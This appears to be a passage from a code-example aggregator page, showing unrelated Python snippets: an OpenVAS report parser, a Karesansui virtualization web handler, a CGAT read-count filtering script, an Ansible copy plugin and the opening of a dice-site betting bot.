				l_port = port_regex_specific.search(l_val.text)
				if l_port:
					l_service = l_port.group(1)
					l_number = int(l_port.group(2))
					l_proto = l_port.group(3)

					try:
						l_partial_result.port = OpenVASPort(l_service,
						                                    l_number,
						                                    l_proto)
					except (TypeError, ValueError) as e:
						logging.warning("%s is not a valid port for %s vulnerability. skipping vulnerability..."
						                % (l_val.text,
						                   l_vid))
						logging.debug(e)
						continue
				else:
					# Looking for port as format: general/tcp
					l_port = port_regex_generic.search(l_val.text)
					if l_port:
						l_service = l_port.group(1)
						l_proto = l_port.group(2)

						try:
							l_partial_result.port = OpenVASPort(l_service, 0, l_proto)
						except (TypeError, ValueError) as e:
							logging.warning("%s is not a valid port for %s vulnerability. skipping vulnerability..."
							                % (l_val.text,
							                   l_vid))
							logging.debug(e)
							continue

			# --------------------------------------------------------------------------
			# NVT
			# --------------------------------------------------------------------------
			elif l_tag == "nvt":

				# The NVT Object
				l_nvt_object = OpenVASNVT()
				try:
					l_nvt_object.oid = l_val.attrib['oid']
				except TypeError as e:
					logging.warning("%s is not a valid NVT oid for %s vulnerability. skipping vulnerability..."
					                % (l_val.attrib['oid'],
					                   l_vid))
					logging.debug(e)
					continue

				# Sub nodes of NVT tag
				l_nvt_symbols = [x for x in dir(l_nvt_object) if not x.startswith("_")]

				for l_nvt in l_val.getchildren():
					l_nvt_tag = l_nvt.tag

					# For each xml tag...
					if l_nvt_tag in l_nvt_symbols:

						# For tags with content, like: <cert>blah</cert>
						if l_nvt.text:

							# For filter tags like <cve>NOCVE</cve>
							if l_nvt.text.startswith("NO"):
								try:
									setattr(l_nvt_object, l_nvt_tag, "")
								except (TypeError, ValueError) as e:
									logging.warning(
										"Empty value is not a valid NVT value for %s property in %s vulnerability. skipping vulnerability..."
										% (l_nvt_tag,
										   l_vid))
									logging.debug(e)
									continue

							# Tags with valid content
							else:
								# --------------------------------------------------------------------------
								# Vulnerability IDs: CVE-..., BID..., BugTraq...
								# --------------------------------------------------------------------------
								if l_nvt_tag.lower() in vulnerability_IDs:
									l_nvt_text = getattr(l_nvt, "text", "")
									try:
										setattr(l_nvt_object, l_nvt_tag, l_nvt_text.split(","))
									except (TypeError, ValueError) as e:
										logging.warning(
											"%s value is not a valid NVT value for %s property in %s vulnerability. skipping vulnerability..."
											% (l_nvt_text,
											   l_nvt_tag,
											   l_vid))
										logging.debug(e)
									continue

								else:
									l_nvt_text = getattr(l_nvt, "text", "")
									try:
										setattr(l_nvt_object, l_nvt_tag, l_nvt_text)
									except (TypeError, ValueError) as e:
										logging.warning(
											"%s value is not a valid NVT value for %s property in %s vulnerability. skipping vulnerability..."
											% (l_nvt_text,
											   l_nvt_tag,
											   l_vid))
										logging.debug(e)
									continue

						# For filter tags without content, like: <cert/>
						else:
							try:
								setattr(l_nvt_object, l_nvt_tag, "")
							except (TypeError, ValueError) as e:
								logging.warning(
									"Empty value is not a valid NVT value for %s property in %s vulnerability. skipping vulnerability..."
									% (l_nvt_tag,
									   l_vid))
								logging.debug(e)
								continue

				# Get CVSS
				cvss_candidate = l_val.find("tags")
				if cvss_candidate is not None and getattr(cvss_candidate, "text", None):
					# Extract data
					cvss_tmp = cvss_regex.search(cvss_candidate.text)
					if cvss_tmp:
						l_nvt_object.cvss_base_vector = cvss_tmp.group(2) if len(cvss_tmp.groups()) >= 2 else ""

				# Add to the NVT Object
				try:
					l_partial_result.nvt = l_nvt_object
				except (TypeError, ValueError) as e:
					logging.warning(
						"NVT oid %s is not a valid NVT value for %s vulnerability. skipping vulnerability..."
						% (l_nvt_object.oid,
						   l_vid))
					logging.debug(e)
					continue

			# --------------------------------------------------------------------------
			# Unknown tags
			# --------------------------------------------------------------------------
			else:
				# Unrecognised tag
				logging.warning("%s tag unrecognised" % l_tag)

		# Add to the return values
		m_return_append(l_partial_result)

	return m_return

Example 123

Project: karesansui
Source File: guest.py
View license
    @auth
    def _GET(self, *param, **params):
        host_id = self.chk_hostby1(param)
        if host_id is None: return web.notfound()

        model = findbyhost1(self.orm, host_id)
        uris = available_virt_uris()

        #import pdb; pdb.set_trace()
        if model.attribute == MACHINE_ATTRIBUTE["URI"]:
            uri_guests = []
            uri_guests_status = {}
            uri_guests_kvg = {}
            uri_guests_info = {}
            uri_guests_name = {}
            segs = uri_split(model.hostname)
            uri = uri_join(segs, without_auth=True)
            creds = ''
            if segs["user"] is not None:
                creds += segs["user"]
                if segs["passwd"] is not None:
                    creds += ':' + segs["passwd"]

            # Output .part
            if self.is_mode_input() is not True:
                try:
                    self.kvc = KaresansuiVirtConnectionAuth(uri,creds)
                    host = MergeHost(self.kvc, model)
                    for guest in host.guests:

                        _virt = self.kvc.search_kvg_guests(guest.info["model"].name)
                        if 0 < len(_virt):
                            for _v in _virt:
                                uuid = _v.get_info()["uuid"]
                                uri_guests_info[uuid] = guest.info
                                uri_guests_kvg[uuid] = _v
                                uri_guests_name[uuid] = guest.info["model"].name.encode("utf8")

                    for name in sorted(uri_guests_name.values(),key=str.lower):
                        for uuid in dict_search(name,uri_guests_name):
                            uri_guests.append(MergeGuest(uri_guests_info[uuid]["model"], uri_guests_kvg[uuid]))
                            uri_guests_status[uuid]  = uri_guests_info[uuid]['virt'].status()

                finally:
                    self.kvc.close()

                # .json
                if self.is_json() is True:
                    guests_json = []
                    for x in uri_guests:
                        guests_json.append(x.get_json(self.me.languages))

                    self.view.uri_guests = json_dumps(guests_json)
                else:
                    self.view.uri_guests = uri_guests
                    self.view.uri_guests_status = uri_guests_status

        self.kvc = KaresansuiVirtConnection()
        try: # libvirt connection scope -->

            # Storage Pool
            #inactive_pool = self.kvc.list_inactive_storage_pool()
            inactive_pool = []
            active_pool = self.kvc.list_active_storage_pool()
            pools = inactive_pool + active_pool
            pools.sort()

            if not pools:
                return web.badrequest('One can not start a storage pool.')

            # Output .input
            if self.is_mode_input() is True:
                self.view.pools = pools
                pools_info = {}
                pools_vols_info = {}
                pools_iscsi_blocks = {}
                already_vols = []
                guests = []

                guests += self.kvc.list_inactive_guest()
                guests += self.kvc.list_active_guest()
                for guest in guests:
                    already_vol = self.kvc.get_storage_volume_bydomain(domain=guest,
                                                                       image_type=None,
                                                                       attr='path')
                    if already_vol:
                        already_vols += already_vol.keys()

                for pool in pools:
                    pool_obj = self.kvc.search_kvn_storage_pools(pool)[0]
                    if pool_obj.is_active() is True:
                        pools_info[pool] = pool_obj.get_info()

                        blocks = None
                        if pools_info[pool]['type'] == 'iscsi':
                            blocks = self.kvc.get_storage_volume_iscsi_block_bypool(pool)
                            if blocks:
                                pools_iscsi_blocks[pool] = []
                        vols_obj = pool_obj.search_kvn_storage_volumes(self.kvc)
                        vols_info = {}

                        for vol_obj in vols_obj:
                            vol_name = vol_obj.get_storage_volume_name()
                            vols_info[vol_name] = vol_obj.get_info()
                            if blocks:
                                if vol_name in blocks and vol_name not in already_vols:
                                    pools_iscsi_blocks[pool].append(vol_obj.get_info())

                        pools_vols_info[pool] = vols_info

                self.view.pools_info = pools_info
                self.view.pools_vols_info = pools_vols_info
                self.view.pools_iscsi_blocks = pools_iscsi_blocks

                bridge_prefix = {
                    "XEN":"xenbr",
                    "KVM":KVM_BRIDGE_PREFIX,
                    }
                self.view.host_id = host_id
                self.view.DEFAULT_KEYMAP = DEFAULT_KEYMAP
                self.view.DISK_NON_QEMU_FORMAT = DISK_NON_QEMU_FORMAT
                self.view.DISK_QEMU_FORMAT = DISK_QEMU_FORMAT

                self.view.hypervisors = {}
                self.view.mac_address = {}
                self.view.keymaps = {}
                self.view.phydev = {}
                self.view.virnet = {}

                used_ports = {}

                for k,v in MACHINE_HYPERVISOR.iteritems():
                    if k in available_virt_mechs():
                        self.view.hypervisors[k] = v
                        uri = uris[k]
                        mem_info = self.kvc.get_mem_info()
                        active_networks = self.kvc.list_active_network()
                        used_graphics_ports = self.kvc.list_used_graphics_port()
                        bus_types = self.kvc.bus_types
                        self.view.bus_types = bus_types
                        self.view.max_mem = mem_info['host_max_mem']
                        self.view.free_mem = mem_info['host_free_mem']
                        self.view.alloc_mem = mem_info['guest_alloc_mem']

                        self.view.mac_address[k] = generate_mac_address(k)
                        self.view.keymaps[k] = eval("get_keymaps(%s_KEYMAP_DIR)" % k)

                        # Physical device
                        phydev = []
                        phydev_regex = re.compile(r"%s" % bridge_prefix[k])
                        for dev,dev_info in get_ifconfig_info().iteritems():
                            try:
                                if phydev_regex.match(dev):
                                    phydev.append(dev)
                            except:
                                pass
                        if len(phydev) == 0:
                            phydev.append("%s0" % bridge_prefix[k])
                        phydev.sort()
                        self.view.phydev[k] = phydev # Physical device

                        # Virtual device
                        self.view.virnet[k] = sorted(active_networks)
                        used_ports[k] = used_graphics_ports


                exclude_ports = []
                for k, _used_port in used_ports.iteritems():
                    exclude_ports = exclude_ports + _used_port
                    exclude_ports = sorted(exclude_ports)
                    exclude_ports = [p for p, q in zip(exclude_ports, exclude_ports[1:] + [None]) if p != q]
                self.view.graphics_port = next_number(GRAPHICS_PORT_MIN_NUMBER,
                                                 PORT_MAX_NUMBER,
                                                 exclude_ports)

            else: # .part
                models = findbyhost1guestall(self.orm, host_id)
                guests = []
                if models:
                    # Physical Guest Info
                    self.view.hypervisors = {}
                    for model in models:
                        for k,v in MACHINE_HYPERVISOR.iteritems():
                            if k in available_virt_mechs():
                                self.view.hypervisors[k] = v
                                uri = uris[k]
                                if hasattr(self, "kvc") is not True:
                                    self.kvc = KaresansuiVirtConnection(uri)
                                domname = self.kvc.uuid_to_domname(model.uniq_key)
                                #if not domname: return web.conflict(web.ctx.path)
                                _virt = self.kvc.search_kvg_guests(domname)
                                if 0 < len(_virt):
                                    guests.append(MergeGuest(model, _virt[0]))
                                else:
                                    guests.append(MergeGuest(model, None))

                # Exported Guest Info
                exports = {}
                for pool_name in pools:
                    files = []

                    pool = self.kvc.search_kvn_storage_pools(pool_name)
                    path = pool[0].get_info()["target"]["path"]

                    if os.path.exists(path):
                        for _afile in glob.glob("%s/*/info.dat" % (path,)):
                            param = ExportConfigParam()
                            param.load_xml_config(_afile)

                            _dir = os.path.dirname(_afile)

                            uuid = param.get_uuid()
                            name = param.get_domain()
                            created = param.get_created()
                            title = param.get_title()
                            if title != "":
                                title = re.sub("[\r\n]","",title)
                            if title == "":
                                title = _('untitled')

                            if created != "":
                                created_str = time.strftime("%Y/%m/%d %H:%M:%S", \
                                                            time.localtime(float(created)))
                            else:
                                created_str = _("N/A")

                            files.append({"dir": _dir,
                                          "pool" : pool_name,
                                          #"b64dir" : base64_encode(_dir),
                                          "uuid" : uuid,
                                          "name" : name,
                                          "created" : int(created),
                                          "created_str" : created_str,
                                          "title" : title,
                                          "icon" : param.get_database()["icon"],
                                          })

                    exports[pool_name] = files

                # .json
                if self.is_json() is True:
                    guests_json = []
                    for x in guests:
                        guests_json.append(x.get_json(self.me.languages))

                    self.view.guests = json_dumps(guests_json)
                else:
                    self.view.exports = exports
                    self.view.guests = guests

            return True
        except:
            pass
        finally:
            #self.kvc.close()
            pass # libvirt connection scope --> Guest#_post()

Example 124

Project: cgat
Source File: counts2counts.py
View license
def main(argv=None):
    """script main.

    parses command line options in sys.argv, unless *argv* is given.
    """

    if not argv:
        argv = sys.argv

    # setup command line parser
    parser = E.OptionParser(version="%prog version: $Id$",
                            usage=globals()["__doc__"])

    parser.add_option("-d", "--design-tsv-file", dest="input_filename_design",
                      type="string",
                      help="input file with experimental design "
                      "[default=%default].")

    parser.add_option("-m", "--method", dest="method", type="choice",
                      choices=("filter", "spike", "normalize"),
                      help="differential expression method to apply "
                      "[default=%default].")

    parser.add_option("--filter-min-counts-per-row",
                      dest="filter_min_counts_per_row",
                      type="int",
                      help="remove rows with less than this "
                      "number of counts in total [default=%default].")

    parser.add_option("--filter-min-counts-per-sample",
                      dest="filter_min_counts_per_sample",
                      type="int",
                      help="remove samples with a maximum count per sample of "
                      "less than this numer   [default=%default].")

    parser.add_option("--filter-percentile-rowsums",
                      dest="filter_percentile_rowsums",
                      type="int",
                      help="remove percent of rows with "
                      "lowest total counts [default=%default].")

    parser.add_option("--spike-change-bin-min", dest="min_cbin",
                      type="float",
                      help="minimum bin for change bins [default=%default].")

    parser.add_option("--spike-change-bin-max", dest="max_cbin",
                      type="float",
                      help="maximum bin for change bins [default=%default].")

    parser.add_option("--spike-change-bin-width", dest="width_cbin",
                      type="float",
                      help="bin width for change bins [default=%default].")

    parser.add_option("--spike-initial-bin-min", dest="min_ibin",
                      type="float",
                      help="minimum bin for initial bins[default=%default].")

    parser.add_option("--spike-initial-bin-max", dest="max_ibin",
                      type="float",
                      help="maximum bin for intitial bins[default=%default].")

    parser.add_option("--spike-initial-bin-width", dest="width_ibin",
                      type="float",
                      help="bin width intitial bins[default=%default].")

    parser.add_option("--spike-minimum", dest="min_spike",
                      type="int",
                      help="minimum number of spike-ins required within each bin\
                      [default=%default].")

    parser.add_option("--spike-maximum", dest="max_spike",
                      type="int",
                      help="maximum number of spike-ins allowed within each bin\
                      [default=%default].")

    parser.add_option("--spike-difference-method", dest="difference",
                      type="choice",
                      choices=("relative", "logfold", "abs_logfold"),
                      help="method to use for calculating difference\
                      [default=%default].")

    parser.add_option("--spike-iterations", dest="iterations", type="int",
                      help="number of iterations to generate spike-ins\
                      [default=%default].")

    parser.add_option("--spike-cluster-maximum-distance",
                      dest="cluster_max_distance", type="int",
                      help="maximum distance between adjacent loci in cluster\
                      [default=%default].")

    parser.add_option("--spike-cluster-minimum-size",
                      dest="cluster_min_size", type="int",
                      help="minimum number of loci required per cluster\
                      [default=%default].")

    parser.add_option("--spike-type",
                      dest="spike_type", type="choice",
                      choices=("row", "cluster"),
                      help="spike in type [default=%default].")

    parser.add_option("--spike-subcluster-min-size",
                      dest="min_sbin", type="int",
                      help="minimum size of subcluster\
                      [default=%default].")

    parser.add_option("--spike-subcluster-max-size",
                      dest="max_sbin", type="int",
                      help="maximum size of subcluster\
                      [default=%default].")

    parser.add_option("--spike-subcluster-bin-width",
                      dest="width_sbin", type="int",
                      help="bin width for subcluster size\
                      [default=%default].")

    parser.add_option("--spike-output-method",
                      dest="output_method", type="choice",
                      choices=("append", "seperate"),
                      help="defines whether the spike-ins should be appended\
                      to the original table or seperately [default=%default].")

    parser.add_option("--spike-shuffle-column-suffix",
                      dest="shuffle_suffix", type="string",
                      help="the suffix of the columns which are to be shuffled\
                      [default=%default].")

    parser.add_option("--spike-keep-column-suffix",
                      dest="keep_suffix", type="string",
                      help="a list of suffixes for the columns which are to be\
                      keep along with the shuffled columns[default=%default].")

    parser.add_option("--normalization-method",
                      dest="normalization_method", type="choice",
                      choices=("deseq-size-factors",
                               "total-count",
                               "total-column",
                               "total-row"),
                      help="normalization method to apply [%default]")

    parser.add_option("-t", "--tags-tsv-file", dest="input_filename_tags",
                      type="string",
                      help="input file with tag counts [default=%default].")

    parser.set_defaults(
        input_filename_tags="-",
        method="filter",
        filter_min_counts_per_row=None,
        filter_min_counts_per_sample=None,
        filter_percentile_rowsums=None,
        output_method="seperate",
        difference="logfold",
        spike_type="row",
        min_cbin=0,
        max_cbin=100,
        width_cbin=100,
        min_ibin=0,
        max_ibin=100,
        width_ibin=100,
        max_spike=100,
        min_spike=None,
        iterations=1,
        cluster_max_distance=100,
        cluster_min_size=10,
        min_sbin=1,
        max_sbin=1,
        width_sbin=1,
        shuffle_suffix=None,
        keep_suffix=None,
        normalization_method="deseq-size-factors"
    )

    # add common options (-h/--help, ...) and parse command line
    (options, args) = E.Start(parser, argv=argv, add_output_options=True)

    # load
    if options.keep_suffix:
        # if using suffix, loadTagDataPandas will throw an error as it
        # looks for column names which exactly match the design
        # "tracks" need to write function in Counts.py to handle
        # counts table and design table + suffix
        counts = pd.read_csv(options.stdin, sep="\t",  comment="#")
        inf = IOTools.openFile(options.input_filename_design)
        design = pd.read_csv(inf, sep="\t", index_col=0)
        inf.close()
        design = design[design["include"] != 0]

        if options.method in ("filter", "spike"):
            if options.input_filename_design is None:
                raise ValueError("method '%s' requires a design file" %
                                 options.method)
    else:
        # create Counts object
        # TS if spike type is cluster, need to keep "contig" and "position"
        # columns out of index
        if options.spike_type == "cluster":
            index = None,
        else:
            index = 0
        if options.input_filename_tags == "-":
            counts = Counts.Counts(pd.io.parsers.read_csv(
                options.stdin, sep="\t", index_col=index, comment="#"))
        else:
            counts = Counts.Counts(
                IOTools.openFile(options.input_filename_tags, "r"),
                sep="\t", index_col=index, comment="#")

        # TS normalization doesn't require a design table
        if not options.method == "normalize":

            assert options.input_filename_design and os.path.exists(
                options.input_filename_design)

            # create Design object
            design = Expression.ExperimentalDesign(
                pd.read_csv(
                    IOTools.openFile(options.input_filename_design, "r"),
                    sep="\t", index_col=0, comment="#"))

    if options.method == "filter":

        assert (options.filter_min_counts_per_sample is not None or
                options.filter_min_counts_per_row is not None or
                options.filter_percentile_rowsums is not None), \
            "no filtering parameters have been suplied"

        # filter
        # remove sample with low counts
        if options.filter_min_counts_per_sample:
                counts.removeSamples(
                    min_counts_per_sample=options.filter_min_counts_per_sample)

        # remove observations with low counts
        if options.filter_min_counts_per_row:
                counts.removeObservationsFreq(
                    min_counts_per_row=options.filter_min_counts_per_row)

        # remove bottom percentile of observations
        if options.filter_percentile_rowsums:
                counts.removeObservationsPerc(
                    percentile_rowsums=options.filter_percentile_rowsums)

        nobservations, nsamples = counts.table.shape

        if nobservations == 0:
            E.warn("no observations remaining after filtering- no output")
            return

        if nsamples == 0:
            E.warn("no samples remain after filtering - no output")
            return

        # write out
        counts.table.to_csv(options.stdout, sep="\t", header=True)

    elif options.method == "normalize":

        counts.normalise(method=options.normalization_method,
                         row_title="total")

        # write out
        counts.table.to_csv(options.stdout, sep="\t", header=True)

    elif options.method == "spike":
        # check parameters are sensible and set parameters where they
        # are not explicitly set
        if not options.min_spike:
            E.info("setting minimum number of spikes per bin to equal"
                   "maximum number of spikes per bin (%s)" % options.max_spike)
            options.min_spike = options.max_spike

        if options.spike_type == "cluster":

            assert options.max_sbin <= options.cluster_min_size, \
                ("max size of subscluster: %s is greater than min size of"
                 "cluster: %s" % (options.max_sbin, options.cluster_min_size))

            counts_columns = set(counts.table.columns.values.tolist())

            assert ("contig" in counts_columns and
                    "position" in counts_columns), \
                ("cluster analysis requires columns named 'contig' and"
                 "'position' in the dataframe")

            counts.sort(sort_columns=["contig", "position"], reset_index=True)

        # restrict design table to first pair only

        design.firstPairOnly()

        # get dictionaries to map group members to column names
        # use different methods depending on whether suffixes are supplied
        if options.keep_suffix:
            g_to_keep_tracks, g_to_spike_tracks = design.mapGroupsSuffix(
                options.shuffle_suffix, options.keep_suffix)
        else:
            # if no suffixes supplied, spike and keep tracks are the same
            g_to_track = design.getGroups2Samples()
            g_to_spike_tracks, g_to_keep_tracks = (g_to_track, g_to_track)

        # set up numpy arrays for change and initial values
        change_bins = np.arange(options.min_cbin,
                                options.max_cbin,
                                options.width_cbin)
        initial_bins = np.arange(options.min_ibin,
                                 options.max_ibin,
                                 options.width_ibin)

        E.info("Column boundaries are: %s" % str(change_bins))
        E.info("Row boundaries are: %s" % str(initial_bins))

        # shuffle rows/clusters
        if options.spike_type == "cluster":
            E.info("looking for clusters...")
            clusters_dict = Counts.findClusters(
                counts_sort, options.cluster_max_distance,
                options.cluster_min_size, g_to_spike_tracks, groups)
            if len(clusters_dict) == 0:
                raise Exception("no clusters were found, check parameters")

            E.info("shuffling subcluster regions...")
            output_indices, counts = Counts.shuffleCluster(
                initial_bins, change_bins, g_to_spike_tracks, groups,
                options.difference, options.max_spike,
                options.iterations, clusters_dict,
                options.max_sbin, options.min_sbin, options.width_sbin)

        elif options.spike_type == "row":

            E.info("shuffling rows...")
            output_indices, bin_counts = counts.shuffleRows(
                options.min_cbin, options.max_cbin, options.width_cbin,
                options.min_ibin, options.max_ibin, options.width_ibin,
                g_to_spike_tracks, design.groups, options.difference,
                options.max_spike, options.iterations)

        filled_bins = Counts.thresholdBins(output_indices, bin_counts,
                                           options.min_spike)

        assert len(filled_bins) > 0, "No bins contained enough spike-ins"

        # write out
        counts.outputSpikes(
            filled_bins,
            g_to_keep_tracks, design.groups,
            output_method=options.output_method,
            spike_type=options.spike_type,
            min_cbin=options.min_cbin,
            width_cbin=options.width_cbin,
            max_cbin=options.max_cbin,
            min_ibin=options.min_ibin,
            width_ibin=options.width_ibin,
            max_ibin=options.max_ibin,
            min_sbin=options.min_sbin,
            width_sbin=options.width_sbin,
            max_sbin=options.max_sbin)

    E.Stop()

Example 125

Project: ansible-plugin-copyv
Source File: copyv.py
View license
    def run(self, conn, tmp_path, module_name, module_args, inject, complex_args=None, **kwargs):
        ''' handler for file transfer operations '''

        # load up options
        options = {}
        if complex_args:
            options.update(complex_args)
        options.update(utils.parse_kv(module_args))
        source  = options.get('src', None)
        content = options.get('content', None)
        dest    = options.get('dest', None)
        raw     = utils.boolean(options.get('raw', 'no'))
        force   = utils.boolean(options.get('force', 'yes'))

        # content with newlines is going to be escaped to safely load in yaml
        # now we need to unescape it so that the newlines are evaluated properly
        # when writing the file to disk
        if content:
            if isinstance(content, unicode):
                try:
                    content = content.decode('unicode-escape')
                except UnicodeDecodeError:
                    pass

        if (source is None and content is None and not 'first_available_file' in inject) or dest is None:
            result=dict(failed=True, msg="src (or content) and dest are required")
            return ReturnData(conn=conn, result=result)
        elif (source is not None or 'first_available_file' in inject) and content is not None:
            result=dict(failed=True, msg="src and content are mutually exclusive")
            return ReturnData(conn=conn, result=result)

        # Check if the source ends with a "/"
        source_trailing_slash = False
        if source:
            source_trailing_slash = source.endswith("/")

        # Define content_tempfile in case we set it after finding content populated.
        content_tempfile = None

        # If content is defined make a temp file and write the content into it.
        if content is not None:
            try:
                # If content comes to us as a dict it should be decoded json.
                # We need to encode it back into a string to write it out.
                if type(content) is dict:
                    content_tempfile = self._create_content_tempfile(json.dumps(content))
                else:
                    content_tempfile = self._create_content_tempfile(content)
                source = content_tempfile
            except Exception, err:
                result = dict(failed=True, msg="could not write content temp file: %s" % err)
                return ReturnData(conn=conn, result=result)
        # if we have first_available_file in our vars
        # look up the files and use the first one we find as src
        elif 'first_available_file' in inject:
            found = False
            for fn in inject.get('first_available_file'):
                fn_orig = fn
                fnt = template.template(self.runner.basedir, fn, inject)
                fnd = utils.path_dwim(self.runner.basedir, fnt)
                if not os.path.exists(fnd) and '_original_file' in inject:
                    fnd = utils.path_dwim_relative(inject['_original_file'], 'files', fnt, self.runner.basedir, check=False)
                if os.path.exists(fnd):
                    source = fnd
                    found = True
                    break
            if not found:
                results = dict(failed=True, msg="could not find src in first_available_file list")
                return ReturnData(conn=conn, result=results)
        else:
            source = template.template(self.runner.basedir, source, inject)
            if '_original_file' in inject:
                source = utils.path_dwim_relative(inject['_original_file'], 'files', source, self.runner.basedir)
            else:
                source = utils.path_dwim(self.runner.basedir, source)

        # A list of source file tuples (full_path, relative_path) which will try to copy to the destination
        source_files = []

        # If source is a directory populate our list else source is a file and translate it to a tuple.
        if os.path.isdir(source):
            # Get the amount of spaces to remove to get the relative path.
            if source_trailing_slash:
                sz = len(source) + 1
            else:
                sz = len(source.rsplit('/', 1)[0]) + 1

            # Walk the directory and append the file tuples to source_files.
            for base_path, sub_folders, files in os.walk(source):
                for file in files:
                    full_path = os.path.join(base_path, file)
                    rel_path = full_path[sz:]
                    source_files.append((full_path, rel_path))

            # If it's recursive copy, destination is always a dir,
            # explicitly mark it so (note - copy module relies on this).
            if not conn.shell.path_has_trailing_slash(dest):
                dest = conn.shell.join_path(dest, '')
        else:
            source_files.append((source, os.path.basename(source)))

        changed = False
        diffs = []
        module_result = {"changed": False}

        # A register for if we executed a module.
        # Used to cut down on command calls when not recursive.
        module_executed = False

        # Tell _execute_module to delete the file if there is one file.
        delete_remote_tmp = (len(source_files) == 1)

        # If this is a recursive action create a tmp_path that we can share as the _exec_module create is too late.
        if not delete_remote_tmp:
            if "-tmp-" not in tmp_path:
                tmp_path = self.runner._make_tmp_path(conn)

        # expand any user home dir specifier
        dest = self.runner._remote_expand_user(conn, dest, tmp_path)

        vault = VaultLib(password=self.runner.vault_pass)

        for source_full, source_rel in source_files:
            
            vault_temp_file = None
            data = None

            try:
                data = open(source_full).read()
            except IOError:
                raise errors.AnsibleError("file could not read: %s" % source_full)

            if vault.is_encrypted(data):
                # if the file is encrypted and no password was specified,
                # the decrypt call would throw an error, but we check first
                # since the decrypt function doesn't know the file name
                if self.runner.vault_pass is None:
                    raise errors.AnsibleError("A vault password must be specified to decrypt %s" % source_full)
                    
                data = vault.decrypt(data)
                # Make a temp file
                vault_temp_file = self._create_content_tempfile(data)
                source_full = vault_temp_file;
            
            # Generate a hash of the local file.
            local_checksum = utils.checksum(source_full)

            # If local_checksum is not defined we can't find the file so we should fail out.
            if local_checksum is None:
                result = dict(failed=True, msg="could not find src=%s" % source_full)
                return ReturnData(conn=conn, result=result)

            # This is kind of optimization - if user told us destination is
            # dir, do path manipulation right away, otherwise we still check
            # for dest being a dir via remote call below.
            if conn.shell.path_has_trailing_slash(dest):
                dest_file = conn.shell.join_path(dest, source_rel)
            else:
                dest_file = conn.shell.join_path(dest)

            # Attempt to get the remote checksum
            remote_checksum = self.runner._remote_checksum(conn, tmp_path, dest_file, inject)

            if remote_checksum == '3':
                # The remote_checksum was executed on a directory.
                if content is not None:
                    # If source was defined as content remove the temporary file and fail out.
                    self._remove_tempfile_if_content_defined(content, content_tempfile)
                    result = dict(failed=True, msg="can not use content with a dir as dest")
                    return ReturnData(conn=conn, result=result)
                else:
                    # Append the relative source location to the destination and retry remote_checksum
                    dest_file = conn.shell.join_path(dest, source_rel)
                    remote_checksum = self.runner._remote_checksum(conn, tmp_path, dest_file, inject)

            if remote_checksum == '4':
                result = dict(msg="python isn't present on the system.  Unable to compute checksum", failed=True)
                return ReturnData(conn=conn, result=result)

            if remote_checksum != '1' and not force:
                # remote_file exists so continue to next iteration.
                continue

            if local_checksum != remote_checksum:
                # The checksums don't match and we will change or error out.
                changed = True

                # Create a tmp_path if missing only if this is not recursive.
                # If this is recursive we already have a tmp_path.
                if delete_remote_tmp:
                    if "-tmp-" not in tmp_path:
                        tmp_path = self.runner._make_tmp_path(conn)

                if self.runner.diff and not raw:
                    diff = self._get_diff_data(conn, tmp_path, inject, dest_file, source_full)
                else:
                    diff = {}

                if self.runner.noop_on_check(inject):
                    self._remove_tempfile_if_content_defined(content, content_tempfile)
                    diffs.append(diff)
                    changed = True
                    module_result = dict(changed=True)
                    continue

                # Define a remote directory that we will copy the file to.
                tmp_src = tmp_path + 'source'

                if not raw:
                    conn.put_file(source_full, tmp_src)
                else:
                    conn.put_file(source_full, dest_file)

                # We have copied the file remotely and no longer require our content_tempfile
                self._remove_tempfile_if_content_defined(content, content_tempfile)

                # Remove the vault tempfile if we have one
                if vault_temp_file:
                    os.remove(vault_temp_file);
                    vault_temp_file = None

                # fix file permissions when the copy is done as a different user
                if self.runner.become and self.runner.become_user != 'root' and not raw:
                    self.runner._remote_chmod(conn, 'a+r', tmp_src, tmp_path)

                if raw:
                    # Continue to next iteration if raw is defined.
                    continue

                # Run the copy module

                # src and dest here come after original and override them
                # we pass dest only to make sure it includes trailing slash in case of recursive copy
                new_module_args = dict(
                    src=tmp_src,
                    dest=dest,
                    original_basename=source_rel
                )
                if self.runner.noop_on_check(inject):
                    new_module_args['CHECKMODE'] = True
                if self.runner.no_log:
                    new_module_args['NO_LOG'] = True

                module_args_tmp = utils.merge_module_args(module_args, new_module_args)

                module_return = self.runner._execute_module(conn, tmp_path, 'copy', module_args_tmp, inject=inject, complex_args=complex_args, delete_remote_tmp=delete_remote_tmp)
                module_executed = True

            else:
                # no need to transfer the file, already correct hash, but still need to call
                # the file module in case we want to change attributes
                self._remove_tempfile_if_content_defined(content, content_tempfile)
                
                # Remove the vault tempfile if we have one
                if vault_temp_file:
                    os.remove(vault_temp_file);
                    vault_temp_file = None

                if raw:
                    # Continue to next iteration if raw is defined.
                    # self.runner._remove_tmp_path(conn, tmp_path)
                    continue

                tmp_src = tmp_path + source_rel

                # Build temporary module_args.
                new_module_args = dict(
                    src=tmp_src,
                    dest=dest,
                    original_basename=source_rel
                )
                if self.runner.noop_on_check(inject):
                    new_module_args['CHECKMODE'] = True
                if self.runner.no_log:
                    new_module_args['NO_LOG'] = True

                module_args_tmp = utils.merge_module_args(module_args, new_module_args)

                # Execute the file module.
                module_return = self.runner._execute_module(conn, tmp_path, 'file', module_args_tmp, inject=inject, complex_args=complex_args, delete_remote_tmp=delete_remote_tmp)
                module_executed = True

            module_result = module_return.result
            if not module_result.get('checksum'):
                module_result['checksum'] = local_checksum
            if module_result.get('failed') == True:
                return module_return
            if module_result.get('changed') == True:
                changed = True

        # Delete tmp_path if we were recursive or if we did not execute a module.
        if (not C.DEFAULT_KEEP_REMOTE_FILES and not delete_remote_tmp) \
            or (not C.DEFAULT_KEEP_REMOTE_FILES and delete_remote_tmp and not module_executed):
            self.runner._remove_tmp_path(conn, tmp_path)

        # the file module returns the file path as 'path', but 
        # the copy module uses 'dest', so add it if it's not there
        if 'path' in module_result and 'dest' not in module_result:
            module_result['dest'] = module_result['path']

        # TODO: Support detailed status/diff for multiple files
        if len(source_files) == 1:
            result = module_result
        else:
            result = dict(dest=dest, src=source, changed=changed)
        if len(diffs) == 1:
            return ReturnData(conn=conn, result=result, diff=diffs[0])
        else:
            return ReturnData(conn=conn, result=result)

Example 126

Project: just-dice-bot
Source File: just-dice-bot.py
View license
    def __init__(self):
        print
        print "Simple martingale bot for just-dice.com"
        print "Copyright (C) 2013 KgBC <[email protected]>"
        print "under GPLv2 (see source)"
        print
        print "News/new versions see https://github.com/KgBC/just-dice-bot"
        
        self.user = self.get_conf("user", "")
        self.password = self.get_conf("pass", "")
        #to debug we want a nicer output:
        self.visible = self.get_conf_int("visible", 0)
